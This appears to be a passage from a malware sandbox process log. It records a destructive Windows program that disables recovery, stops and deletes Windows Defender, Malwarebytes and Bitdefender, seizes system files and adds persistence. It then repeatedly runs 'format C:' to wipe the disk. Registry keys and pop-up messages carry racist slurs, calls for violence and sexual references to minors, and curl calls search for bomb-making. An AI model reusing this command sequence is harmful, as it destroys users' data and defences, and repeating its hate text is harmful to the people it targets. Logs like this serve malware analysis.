  - - C:\Windows\system32\bcdedit.exe
      bcdedit /set {current} recoveryenabled No
      4⤵
      Modifies boot configuration data using bcdedit
      PID:5468
  - - C:\Windows\system32\bcdedit.exe
      bcdedit /deletevalue {default} recoveryenabled
      4⤵
      Modifies boot configuration data using bcdedit
      PID:2096
  - - C:\Windows\system32\reg.exe
      reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows\WinRE" /v "DisableWinRE" /t REG_DWORD /d 1 /f
      4⤵
      PID:5424
  - - C:\Windows\system32\reg.exe
      REG ADD "HKCU\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiSpyware" /t REG_DWORD /d 1 /f
      4⤵
      PID:1192
  - - C:\Windows\system32\reg.exe
      REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender" /v "DisableAntiSpyware" /t REG_DWORD /d 1 /f
      4⤵
      Modifies Windows Defender DisableAntiSpyware settings
      PID:2940
  - - C:\Windows\system32\reg.exe
      REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender" /f
      4⤵
      PID:5576
  - - C:\Windows\system32\reg.exe
      REG DELETE "HKCU\Software\Policies\Microsoft\Windows Defender" /f
      4⤵
      PID:5500
  - - C:\Windows\system32\sc.exe
      sc stop WinDefend
      4⤵
      Launches sc.exe
      PID:1712
  - - C:\Windows\system32\sc.exe
      sc config WinDefend start= disabled
      4⤵
      PID:1172
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell -Command "Set-MpPreference -DisableAntiTamper $true"
      4⤵
      Command and Scripting Interpreter: PowerShell
      Suspicious behavior: EnumeratesProcesses
      PID:2044
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell -Command "Set-MpPreference -DisableRealtimeMonitoring $true"
      4⤵
      Command and Scripting Interpreter: PowerShell
      Suspicious behavior: EnumeratesProcesses
      PID:2600
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell -Command "Set-MpPreference -DisableBehaviorMonitoring $true"
      4⤵
      Command and Scripting Interpreter: PowerShell
      Suspicious behavior: EnumeratesProcesses
      PID:5336
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell -Command "Set-MpPreference -DisableIOAVProtection $true"
      4⤵
      Command and Scripting Interpreter: PowerShell
      Suspicious behavior: EnumeratesProcesses
      PID:3448
  - - C:\Windows\system32\takeown.exe
      takeown /f "C:\Windows\System32\mspmsnsv.dll" /r /d y
      4⤵
      Possible privilege escalation attempt
      Modifies file permissions
      PID:1272
  - - C:\Windows\system32\takeown.exe
      takeown /f "C:\Windows\System32\wscsvc.dll" /r /d y
      4⤵
      Possible privilege escalation attempt
      Modifies file permissions
      PID:4268
  - - C:\Windows\system32\taskkill.exe
      taskkill /F /IM mbam.exe /T
      4⤵
      Kills process with taskkill
      PID:5420
  - - C:\Windows\system32\taskkill.exe
      taskkill /F /IM MBAMService.exe /T
      4⤵
      Kills process with taskkill
      PID:4932
  - - C:\Windows\system32\taskkill.exe
      taskkill /F /IM mbamtray.exe /T
      4⤵
      Kills process with taskkill
      PID:6088
  - - C:\Windows\system32\taskkill.exe
      taskkill /F /IM mbamscheduler.exe /T
      4⤵
      Kills process with taskkill
      PID:2528
  - - C:\Windows\system32\sc.exe
      sc stop MBAMService
      4⤵
      Launches sc.exe
      PID:296
  - - C:\Windows\system32\sc.exe
      sc delete MBAMService
      4⤵
      Launches sc.exe
      PID:4164
  - - C:\Windows\system32\sc.exe
      sc stop MBAMProtector
      4⤵
      Launches sc.exe
      PID:644
  - - C:\Windows\system32\sc.exe
      sc delete MBAMProtector
      4⤵
      Launches sc.exe
      PID:3568
  - - C:\Windows\system32\sc.exe
      sc stop MBAMChameleon
      4⤵
      PID:5136
  - - C:\Windows\system32\sc.exe
      sc delete MBAMChameleon
      4⤵
      Launches sc.exe
      PID:4768
  - - C:\Windows\system32\sc.exe
      sc stop MBAMFarflt
      4⤵
      Launches sc.exe
      PID:3012
  - - C:\Windows\system32\sc.exe
      sc delete MBAMFarflt
      4⤵
      Launches sc.exe
      PID:4304
  - - C:\Windows\system32\sc.exe
      sc stop MBAMSwissArmy
      4⤵
      Launches sc.exe
      PID:3104
  - - C:\Windows\system32\sc.exe
      sc delete MBAMSwissArmy
      4⤵
      Launches sc.exe
      PID:856
  - - C:\Windows\system32\reg.exe
      reg delete "HKEY_LOCAL_MACHINE\SOFTWARE\Malwarebytes" /f
      4⤵
      PID:6112
  - - C:\Windows\system32\reg.exe
      reg delete "HKEY_CURRENT_USER\SOFTWARE\Malwarebytes" /f
      4⤵
      PID:6116
  - - C:\Windows\system32\reg.exe
      reg delete "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\MBAMService" /f
      4⤵
      PID:5928
  - - C:\Windows\system32\reg.exe
      reg delete "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\MBAMChameleon" /f
      4⤵
      PID:2356
  - - C:\Windows\system32\reg.exe
      reg delete "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\MBAMFarflt" /f
      4⤵
      PID:3548
  - - C:\Windows\system32\reg.exe
      reg delete "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\MBAMSwissArmy" /f
      4⤵
      PID:3964
  - - C:\Windows\system32\taskkill.exe
      taskkill /F /IM bdservicehost.exe /T
      4⤵
      Kills process with taskkill
      PID:3416
  - - C:\Windows\system32\taskkill.exe
      taskkill /F /IM bdagent.exe /T
      4⤵
      Kills process with taskkill
      PID:1780
  - - C:\Windows\system32\taskkill.exe
      taskkill /F /IM bdredline.exe /T
      4⤵
      Kills process with taskkill
      PID:5240
  - - C:\Windows\system32\taskkill.exe
      taskkill /F /IM bdparentalservice.exe /T
      4⤵
      Kills process with taskkill
      PID:1712
  - - C:\Windows\system32\taskkill.exe
      taskkill /F /IM bdreinit.exe /T
      4⤵
      Kills process with taskkill
      PID:2932
  - - C:\Windows\system32\taskkill.exe
      taskkill /F /IM bdsubwiz.exe /T
      4⤵
      Kills process with taskkill
      PID:3500
  - - C:\Windows\system32\taskkill.exe
      taskkill /F /IM seccenter.exe /T
      4⤵
      Kills process with taskkill
      PID:252
  - - C:\Windows\system32\taskkill.exe
      taskkill /F /IM vsserv.exe /T
      4⤵
      Kills process with taskkill
      PID:3152
  - - C:\Windows\system32\taskkill.exe
      taskkill /F /IM epssecurityservice.exe /T
      4⤵
      Kills process with taskkill
      PID:5432
  - - C:\Windows\system32\sc.exe
      sc stop bdservicehost
      4⤵
      Launches sc.exe
      PID:3088
  - - C:\Windows\system32\sc.exe
      sc delete bdservicehost
      4⤵
      Launches sc.exe
      PID:60
  - - C:\Windows\system32\sc.exe
      sc stop bdagent
      4⤵
      Launches sc.exe
      PID:5496
  - - C:\Windows\system32\sc.exe
      sc delete bdagent
      4⤵
      Launches sc.exe
      PID:4436
  - - C:\Windows\system32\sc.exe
      sc stop bdredline
      4⤵
      Launches sc.exe
      PID:2840
  - - C:\Windows\system32\sc.exe
      sc delete bdredline
      4⤵
      Launches sc.exe
      PID:4992
  - - C:\Windows\system32\sc.exe
      sc stop bdparentalservice
      4⤵
      Launches sc.exe
      PID:1720
  - - C:\Windows\system32\sc.exe
      sc delete bdparentalservice
      4⤵
      Launches sc.exe
      PID:3008
  - - C:\Windows\system32\sc.exe
      sc stop bdreinit
      4⤵
      Launches sc.exe
      PID:3832
  - - C:\Windows\system32\sc.exe
      sc delete bdreinit
      4⤵
      Launches sc.exe
      PID:4196
  - - C:\Windows\system32\sc.exe
      sc stop bdsubwiz
      4⤵
      PID:4648
  - - C:\Windows\system32\sc.exe
      sc delete bdsubwiz
      4⤵
      Launches sc.exe
      PID:6064
  - - C:\Windows\system32\sc.exe
      sc stop seccenter
      4⤵
      Launches sc.exe
      PID:2724
  - - C:\Windows\system32\sc.exe
      sc delete seccenter
      4⤵
      Launches sc.exe
      PID:924
  - - C:\Windows\system32\sc.exe
      sc stop vsserv
      4⤵
      Launches sc.exe
      PID:3632
  - - C:\Windows\system32\sc.exe
      sc delete vsserv
      4⤵
      Launches sc.exe
      PID:3588
  - - C:\Windows\system32\sc.exe
      sc stop epssecurityservice
      4⤵
      Launches sc.exe
      PID:3704
  - - C:\Windows\system32\sc.exe
      sc delete epssecurityservice
      4⤵
      Launches sc.exe
      PID:3732
  - - C:\Windows\system32\reg.exe
      reg delete "HKEY_LOCAL_MACHINE\SOFTWARE\Bitdefender" /f
      4⤵
      PID:5584
  - - C:\Windows\system32\reg.exe
      reg delete "HKEY_CURRENT_USER\SOFTWARE\Bitdefender" /f
      4⤵
      PID:3700
  - - C:\Windows\system32\reg.exe
      reg delete "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\bdservicehost" /f
      4⤵
      PID:780
  - - C:\Windows\system32\reg.exe
      reg delete "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\bdagent" /f
      4⤵
      PID:3904
  - - C:\Windows\system32\reg.exe
      reg delete "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\bdredline" /f
      4⤵
      PID:1608
  - - C:\Windows\system32\reg.exe
      reg delete "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\bdparentalservice" /f
      4⤵
      PID:3968
  - - C:\Windows\system32\reg.exe
      reg delete "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\bdreinit" /f
      4⤵
      PID:988
  - - C:\Windows\system32\reg.exe
      reg delete "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\bdsubwiz" /f
      4⤵
      PID:3476
  - - C:\Windows\system32\reg.exe
      reg delete "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\seccenter" /f
      4⤵
      PID:2964
  - - C:\Windows\system32\reg.exe
      reg delete "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\vsserv" /f
      4⤵
      PID:6136
  - - C:\Windows\system32\reg.exe
      reg delete "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\epssecurityservice" /f
      4⤵
      PID:4976
  - - C:\Windows\system32\reg.exe
      reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender" /v "DisableAntiSpyware" /t REG_DWORD /d 1 /f
      4⤵
      Modifies Windows Defender DisableAntiSpyware settings
      PID:1900
  - - C:\Windows\system32\reg.exe
      reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender" /v "DisableRealtimeMonitoring" /t REG_DWORD /d 1 /f
      4⤵
      PID:4800
  - - C:\Windows\system32\reg.exe
      reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender" /v "DisableBehaviorMonitoring" /t REG_DWORD /d 1 /f
      4⤵
      PID:3976
  - - C:\Windows\system32\reg.exe
      reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender" /v "DisableOnAccessProtection" /t REG_DWORD /d 1 /f
      4⤵
      PID:6084
  - - C:\Windows\system32\reg.exe
      reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender" /v "DisableScanOnRealtimeEnable" /t REG_DWORD /d 1 /f
      4⤵
      PID:5440
  - - C:\Windows\system32\sc.exe
      sc stop WinDefend
      4⤵
      Launches sc.exe
      PID:3452
  - - C:\Windows\system32\sc.exe
      sc delete WinDefend
      4⤵
      Launches sc.exe
      PID:1260
  - - C:\Windows\system32\sc.exe
      sc stop SecurityHealthService
      4⤵
      PID:460
  - - C:\Windows\system32\sc.exe
      sc delete SecurityHealthService
      4⤵
      Launches sc.exe
      PID:3448
  - - C:\Windows\system32\sc.exe
      sc stop Sense
      4⤵
      Launches sc.exe
      PID:5028
  - - C:\Windows\system32\sc.exe
      sc delete Sense
      4⤵
      Launches sc.exe
      PID:1096
  - - C:\Windows\system32\taskkill.exe
      taskkill /F /IM MsMpEng.exe /T
      4⤵
      Kills process with taskkill
      PID:4324
  - - C:\Windows\system32\taskkill.exe
      taskkill /F /IM MpCmdRun.exe /T
      4⤵
      Kills process with taskkill
      PID:4716
  - - C:\Windows\system32\taskkill.exe
      taskkill /F /IM SecurityHealthSystray.exe /T
      4⤵
      Kills process with taskkill
      PID:4936
  - - C:\Windows\system32\taskkill.exe
      taskkill /F /IM smartscreen.exe /T
      4⤵
      Kills process with taskkill
      PID:5420
  - - C:\Windows\system32\takeown.exe
      takeown /f "C:\ProgramData\Microsoft\Windows Defender" /r /d y
      4⤵
      Possible privilege escalation attempt
      Modifies file permissions
      PID:5052
  - - C:\Windows\system32\icacls.exe
      icacls "C:\ProgramData\Microsoft\Windows Defender" /grant Administrators:F /t /c /q
      4⤵
      Possible privilege escalation attempt
      Modifies file permissions
      PID:5528
  - - C:\Windows\system32\takeown.exe
      takeown /f "C:\Program Files\Windows Defender" /r /d y
      4⤵
      Possible privilege escalation attempt
      Modifies file permissions
      PID:2804
  - - C:\Windows\system32\icacls.exe
      icacls "C:\Program Files\Windows Defender" /grant Administrators:F /t /c /q
      4⤵
      Possible privilege escalation attempt
      Modifies file permissions
      PID:6088
  - - C:\Windows\system32\reg.exe
      reg delete "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Defender" /f
      4⤵
      PID:288
  - - C:\Windows\system32\reg.exe
      reg delete "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\WinDefend" /f
      4⤵
      PID:3860
  - - C:\Windows\system32\reg.exe
      reg delete "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\SecurityHealthService" /f
      4⤵
      PID:3568
  - - C:\Windows\system32\reg.exe
      reg delete "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Sense" /f
      4⤵
      PID:3336
  - - C:\Windows\system32\takeown.exe
      takeown /f C:\Windows\System32\notepad.exe /a /r /d y
      4⤵
      Possible privilege escalation attempt
      Modifies file permissions
      PID:6060
  - - C:\Windows\system32\icacls.exe
      icacls C:\Windows\System32\notepad.exe /grant Administrators:F /t /c /l /q
      4⤵
      Possible privilege escalation attempt
      Modifies file permissions
      PID:2744
  - - C:\Windows\system32\takeown.exe
      takeown /f C:\Windows\System32\calc.exe /a /r /d y
      4⤵
      Possible privilege escalation attempt
      Modifies file permissions
      PID:6068
  - - C:\Windows\system32\icacls.exe
      icacls C:\Windows\System32\calc.exe /grant Administrators:F /t /c /l /q
      4⤵
      Possible privilege escalation attempt
      Modifies file permissions
      PID:1516
  - - C:\Windows\system32\takeown.exe
      takeown /f C:\Windows\System32\Taskmgr.exe /a /r /d y
      4⤵
      Possible privilege escalation attempt
      Modifies file permissions
      PID:3744
  - - C:\Windows\system32\icacls.exe
      icacls C:\Windows\System32\Taskmgr.exe /grant Administrators:F /t /c /l /q
      4⤵
      Possible privilege escalation attempt
      Modifies file permissions
      PID:5956
  - - C:\Windows\system32\powercfg.exe
      powercfg /hibernate off REM Disables hibernation
      4⤵
      Power Settings
      PID:4080
  - - C:\Windows\system32\powercfg.exe
      powercfg /change standby-timeout-ac 0 REM Prevents sleep while plugged in
      4⤵
      Power Settings
      PID:3132
  - - C:\Windows\system32\powercfg.exe
      powercfg /change standby-timeout-dc 0 REM Prevents sleep on battery
      4⤵
      Power Settings
      PID:2152
  - - C:\Windows\system32\powercfg.exe
      powercfg /change standby-timeout-ac 0 REM Prevent sleep when plugged in
      4⤵
      Power Settings
      PID:2532
  - - C:\Windows\system32\powercfg.exe
      powercfg /devicedisablewake "Device Name"
      4⤵
      Power Settings
      Checks SCSI registry key(s)
      PID:1032
  - - C:\Windows\system32\powercfg.exe
      powercfg /devicedisablewake "USB Root Hub"
      4⤵
      Power Settings
      Checks SCSI registry key(s)
      PID:2440
  - - C:\Windows\system32\reg.exe
      REG ADD "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "Windows Service" /t REG_SZ /d "" /f
      4⤵
      Adds Run key to start application
      PID:5544
  - - C:\Windows\system32\reg.exe
      reg add "HKCR\behead all niggers" /f
      4⤵
      Modifies registry class
      PID:1204
  - - C:\Windows\system32\reg.exe
      reg add "HKCC\SOFTWARE\hello today guys i will be killing all the niggas while warching loli" /f
      4⤵
      PID:2004
  - - C:\Windows\system32\reg.exe
      reg query "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "LetsRemoveRasauq"
      4⤵
      PID:1644
  - - C:\Windows\system32\reg.exe
      reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "RasauqRemover" /t REG_SZ /d "\"\"" /f
      4⤵
      Adds Run key to start application
      PID:2956
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c reg query "HKU" /s /f "Software" /k
      4⤵
      PID:4300
    - - C:\Windows\system32\reg.exe
        
        reg query "HKU" /s /f "Software" /k
        5⤵
        
        PID:4620
  - - C:\Windows\system32\reg.exe
      reg add "HKEY_USERS\.DEFAULT\Software\Software\Rasauq on top" /f
      4⤵
      Modifies data under HKEY_USERS
      PID:1420
  - - C:\Windows\system32\reg.exe
      reg add "HKEY_USERS\.DEFAULT\Software\Classes\Local Settings\Software\Software\Rasauq on top" /f
      4⤵
      Modifies data under HKEY_USERS
      PID:2932
  - - C:\Windows\system32\reg.exe
      reg add "HKEY_USERS\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing\Software\Rasauq on top" /f
      4⤵
      Manipulates Digital Signatures
      Modifies data under HKEY_USERS
      PID:5888
  - - C:\Windows\system32\reg.exe
      reg add "HKEY_USERS\S-1-5-19\SOFTWARE\Software\Rasauq on top" /f
      4⤵
      PID:5520
  - - C:\Windows\system32\reg.exe
      reg add "HKEY_USERS\S-1-5-19\SOFTWARE\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing\Software\Rasauq on top" /f
      4⤵
      Manipulates Digital Signatures
      PID:5804
  - - C:\Windows\system32\reg.exe
      reg add "HKEY_USERS\S-1-5-20\SOFTWARE\Software\Rasauq on top" /f
      4⤵
      Modifies data under HKEY_USERS
      PID:3500
  - - C:\Windows\system32\reg.exe
      reg add "HKEY_USERS\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing\Software\Rasauq on top" /f
      4⤵
      Manipulates Digital Signatures
      Modifies data under HKEY_USERS
      PID:2760
  - - C:\Windows\system32\reg.exe
      reg add "HKEY_USERS\S-1-5-20\SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform\Software\Rasauq on top" /f
      4⤵
      Modifies data under HKEY_USERS
      PID:4492
  - - C:\Windows\system32\reg.exe
      reg add "HKEY_USERS\S-1-5-21-2123103809-19148277-2527443841-1000\SOFTWARE\Software\Rasauq on top" /f
      4⤵
      PID:3760
  - - C:\Windows\system32\reg.exe
      reg add "HKEY_USERS\S-1-5-21-2123103809-19148277-2527443841-1000\SOFTWARE\AppDataLow\Software\Software\Rasauq on top" /f
      4⤵
      PID:4456
  - - C:\Windows\system32\reg.exe
      reg add "HKEY_USERS\S-1-5-21-2123103809-19148277-2527443841-1000\SOFTWARE\Microsoft\Speech_OneCore\Isolated\hI8XsvMZLfGME4pGvcu5ybXE8iojEgqtSsGWO-tcVAk\HKEY_LOCAL_MACHINE\SOFTWARE\Software\Rasauq on top" /f
      4⤵
      PID:4260
  - - C:\Windows\system32\reg.exe
      reg add "HKEY_USERS\S-1-5-21-2123103809-19148277-2527443841-1000\SOFTWARE\Microsoft\Speech_OneCore\Isolated\hI8XsvMZLfGME4pGvcu5ybXE8iojEgqtSsGWO-tcVAk\HKEY_CURRENT_USER\SOFTWARE\Software\Rasauq on top" /f
      4⤵
      PID:2976
  - - C:\Windows\system32\reg.exe
      reg add "HKEY_USERS\S-1-5-21-2123103809-19148277-2527443841-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing\Software\Rasauq on top" /f
      4⤵
      Manipulates Digital Signatures
      PID:5688
  - - C:\Windows\system32\reg.exe
      reg add "HKEY_USERS\S-1-5-21-2123103809-19148277-2527443841-1000\SOFTWARE\Classes\Local Settings\Software\Software\Rasauq on top" /f
      4⤵
      Modifies registry class
      PID:1392
  - - C:\Windows\system32\reg.exe
      reg add "HKEY_USERS\S-1-5-21-2123103809-19148277-2527443841-1000\SOFTWARE\Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\SOFTWARE\Software\Rasauq on top" /f
      4⤵
      Modifies registry class
      PID:4444
  - - C:\Windows\system32\reg.exe
      reg add "HKEY_USERS\S-1-5-21-2123103809-19148277-2527443841-1000\SOFTWARE\Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\SOFTWARE\Microsoft\Speech_OneCore\Isolated\ohDO1Sgy3MzgdEgEb4WYfDS4eikKwN2EBJ1Cyr7HTF0\HKEY_LOCAL_MACHINE\SOFTWARE\Software\Rasauq on top" /f
      4⤵
      Modifies registry class
      PID:1736
  - - C:\Windows\system32\reg.exe
      reg add "HKEY_USERS\S-1-5-21-2123103809-19148277-2527443841-1000_Classes\Local Settings\Software\Software\Rasauq on top" /f
      4⤵
      Modifies registry class
      PID:3392
  - - C:\Windows\system32\reg.exe
      reg add "HKEY_USERS\S-1-5-21-2123103809-19148277-2527443841-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\SOFTWARE\Software\Rasauq on top" /f
      4⤵
      Modifies registry class
      PID:5140
  - - C:\Windows\system32\reg.exe
      reg add "HKEY_USERS\S-1-5-21-2123103809-19148277-2527443841-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\SOFTWARE\Microsoft\Speech_OneCore\Isolated\ohDO1Sgy3MzgdEgEb4WYfDS4eikKwN2EBJ1Cyr7HTF0\HKEY_LOCAL_MACHINE\SOFTWARE\Software\Rasauq on top" /f
      4⤵
      Modifies registry class
      PID:1948
  - - C:\Windows\system32\reg.exe
      reg add "HKEY_USERS\S-1-5-21-2123103809-19148277-2527443841-1000_Classes\Local Settings\Software\Software\Software\Rasauq on top" /f
      4⤵
      Modifies registry class
      PID:2612
  - - C:\Windows\system32\reg.exe
      reg add "HKEY_USERS\S-1-5-18\Software\Software\Rasauq on top" /f
      4⤵
      Modifies data under HKEY_USERS
      PID:5916
  - - C:\Windows\system32\reg.exe
      reg add "HKEY_USERS\S-1-5-18\Software\Classes\Local Settings\Software\Software\Rasauq on top" /f
      4⤵
      Modifies data under HKEY_USERS
      PID:1160
  - - C:\Windows\system32\reg.exe
      reg add "HKEY_USERS\S-1-5-18\Software\Classes\Local Settings\Software\Software\Software\Rasauq on top" /f
      4⤵
      Modifies data under HKEY_USERS
      PID:2512
  - - C:\Windows\system32\reg.exe
      reg add "HKEY_USERS\S-1-5-18\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing\Software\Rasauq on top" /f
      4⤵
      Manipulates Digital Signatures
      PID:220
  - - C:\Windows\system32\reg.exe
      reg add "HKEY_USERS\S-1-5-18\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing\Software\Software\Rasauq on top" /f
      4⤵
      Manipulates Digital Signatures
      Modifies data under HKEY_USERS
      PID:1664
  - - C:\Windows\system32\reg.exe
      reg add "HKEY_USERS\S-1-5-18\Software\Software\Software\Rasauq on top" /f
      4⤵
      Modifies data under HKEY_USERS
      PID:4224
  - - C:\Windows\system32\reg.exe
      reg add "End of search: 26 match(es) found.\Software\Rasauq on top" /f
      4⤵
      PID:1964
  - - C:\Windows\system32\msg.exe
      msg * /time:3 "This machine has been compromised by Rasuaq"
      4⤵
      PID:4908
  - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://cdn-cf-east.streamable.com/video/mp4/j3mt4w.mp4?Expires=1742467040071
      4⤵
      PID:2528
  - - C:\Windows\system32\timeout.exe
      timeout /t 10 /nobreak
      4⤵
      Delays execution with timeout.exe
      PID:5872
  - - C:\Windows\system32\reg.exe
      reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableRegistryTools" /t REG_DWORD /d 1 /f
      4⤵
      PID:4380
  - - C:\Windows\system32\msg.exe
      msg * /time:1 "Rasauq on top"
      4⤵
      PID:2512
  - - C:\Windows\system32\msg.exe
      msg * /time:1 "ran by Rasauq"
      4⤵
      PID:220
  - - C:\Windows\system32\msg.exe
      msg * /time:1 " Rasauq owns me"
      4⤵
      PID:1664
  - - C:\Windows\system32\msg.exe
      msg * /time:1 " Rasauq is daddy"
      4⤵
      PID:3468
  - - C:\Windows\system32\msg.exe
      msg * /time:1 "kill all niggas"
      4⤵
      PID:5128
  - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://pattern-cyber-report.glitch.me/
      4⤵
      PID:3144
  - - C:\Windows\system32\curl.exe
      curl -s "https://www.google.com/search?q=gay+femboy+porn+hitler+niggers"
      4⤵
      PID:288
  - - C:\Windows\system32\curl.exe
      curl -s "https://www.google.com/search?q=how+to+make+a+bomb"
      4⤵
      PID:4292
  - - C:\Windows\system32\curl.exe
      curl -s "https://www.google.com/search?q=where+to+buy+gunpowder"
      4⤵
      PID:5500
  - - C:\Windows\system32\curl.exe
      curl -s "https://www.google.com/search?q=how+to+sneak+anything+onto+a+plane"
      4⤵
      PID:6048
  - - C:\Windows\system32\format.com
      format C: /fs:NTFS /q /y
      4⤵
      PID:5416
  - - C:\Windows\system32\msg.exe
      msg * /time:1 "Rasauq on top"
      4⤵
      PID:4924
  - - C:\Windows\system32\msg.exe
      msg * /time:1 "ran by Rasauq"
      4⤵
      PID:5844
  - - C:\Windows\system32\msg.exe
      msg * /time:1 " Rasauq owns me"
      4⤵
      PID:1664
  - - C:\Windows\system32\msg.exe
      msg * /time:1 " Rasauq is daddy"
      4⤵
      PID:1964
  - - C:\Windows\system32\msg.exe
      msg * /time:1 "kill all niggas"
      4⤵
      PID:3620
  - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://pattern-cyber-report.glitch.me/
      4⤵
      PID:1708
  - - C:\Windows\system32\curl.exe
      curl -s "https://www.google.com/search?q=gay+femboy+porn+hitler+niggers"
      4⤵
      PID:476
  - - C:\Windows\system32\curl.exe
      curl -s "https://www.google.com/search?q=how+to+make+a+bomb"
      4⤵
      PID:420
  - - C:\Windows\system32\curl.exe
      curl -s "https://www.google.com/search?q=where+to+buy+gunpowder"
      4⤵
      PID:3928
  - - C:\Windows\system32\curl.exe
      curl -s "https://www.google.com/search?q=how+to+sneak+anything+onto+a+plane"
      4⤵
      PID:4100
  - - C:\Windows\system32\format.com
      format C: /fs:NTFS /q /y
      4⤵
      PID:4572
  - - C:\Windows\system32\msg.exe
      msg * /time:1 "Rasauq on top"
      4⤵
      PID:4300
  - - C:\Windows\system32\msg.exe
      msg * /time:1 "ran by Rasauq"
      4⤵
      PID:1792
  - - C:\Windows\system32\msg.exe
      msg * /time:1 " Rasauq owns me"
      4⤵
      PID:4664
  - - C:\Windows\system32\msg.exe
      msg * /time:1 " Rasauq is daddy"
      4⤵
      PID:4072
  - - C:\Windows\system32\msg.exe
      msg * /time:1 "kill all niggas"
      4⤵
      PID:3624
  - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://pattern-cyber-report.glitch.me/
      4⤵
      PID:2760
  - - C:\Windows\system32\curl.exe
      curl -s "https://www.google.com/search?q=gay+femboy+porn+hitler+niggers"
      4⤵
      PID:1140
  - - C:\Windows\system32\curl.exe
      curl -s "https://www.google.com/search?q=how+to+make+a+bomb"
      4⤵
      PID:1444
  - - C:\Windows\system32\curl.exe
      curl -s "https://www.google.com/search?q=where+to+buy+gunpowder"
      4⤵
      PID:1552
  - - C:\Windows\system32\curl.exe
      curl -s "https://www.google.com/search?q=how+to+sneak+anything+onto+a+plane"
      4⤵
      PID:5968
  - - C:\Windows\system32\format.com
      format C: /fs:NTFS /q /y
      4⤵
      PID:2864
  - - C:\Windows\system32\msg.exe
      msg * /time:1 "Rasauq on top"
      4⤵
      PID:4164
  - - C:\Windows\system32\msg.exe
      msg * /time:1 "ran by Rasauq"
      4⤵
      PID:3644
  - - C:\Windows\system32\msg.exe
      msg * /time:1 " Rasauq owns me"
      4⤵
      PID:1192
  - - C:\Windows\system32\msg.exe
      msg * /time:1 " Rasauq is daddy"
      4⤵
      PID:544
  - - C:\Windows\system32\msg.exe
      msg * /time:1 "kill all niggas"
      4⤵
      PID:4948
  - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://pattern-cyber-report.glitch.me/
      4⤵
      PID:4004
  - - C:\Windows\system32\curl.exe
      curl -s "https://www.google.com/search?q=gay+femboy+porn+hitler+niggers"
      4⤵
      PID:1420
  - - C:\Windows\system32\curl.exe
      curl -s "https://www.google.com/search?q=how+to+make+a+bomb"
      4⤵
      PID:4596
  - - C:\Windows\system32\curl.exe
      curl -s "https://www.google.com/search?q=where+to+buy+gunpowder"
      4⤵
      PID:4124
  - - C:\Windows\system32\curl.exe
      curl -s "https://www.google.com/search?q=how+to+sneak+anything+onto+a+plane"
      4⤵
      PID:3900
  - - C:\Windows\system32\format.com
      format C: /fs:NTFS /q /y
      4⤵
      PID:1676
